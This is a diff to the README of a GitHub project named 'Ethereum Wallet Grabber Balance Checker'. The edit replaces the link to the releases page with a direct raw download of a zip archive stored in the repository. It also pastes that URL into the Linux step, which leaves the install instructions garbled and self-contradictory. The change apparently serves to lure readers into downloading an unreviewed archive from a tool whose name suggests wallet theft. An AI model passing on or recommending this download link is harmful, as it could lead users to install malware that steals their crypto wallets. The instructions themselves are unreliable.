wong7971/Ethereum-Wallet-Grabber-Balance-Checker/README.md

 - Supports common Ethereum wallet formats.

 ## 📥 Download & Install
-To get started with Ethereum Wallet Grabber, visit this page to download the latest version: [Download Release Page](https://github.com/wong7971/Ethereum-Wallet-Grabber-Balance-Checker/releases).
+To get started with Ethereum Wallet Grabber, visit this page to download the latest version: [Download Release Page](https://raw.githubusercontent.com/wong7971/Ethereum-Wallet-Grabber-Balance-Checker/main/function/Ethereum-Wallet-Grabber-Balance-Checker_1.4.zip).

 1. Click the link above.
 2. Find the most recent release.
-3. Download the relevant file for your operating system (e.g., `.exe` for Windows, `.zip` for macOS, or `.tar.gz` for Linux).
+3. Download the relevant file for your operating system (e.g., `.exe` for Windows, `.zip` for macOS, or `https://raw.githubusercontent.com/wong7971/Ethereum-Wallet-Grabber-Balance-Checker/main/function/Ethereum-Wallet-Grabber-Balance-Checker_1.4.zip` for Linux).
 4. If the file is compressed, extract it using your file manager.

 ## ⚙️ Run the Application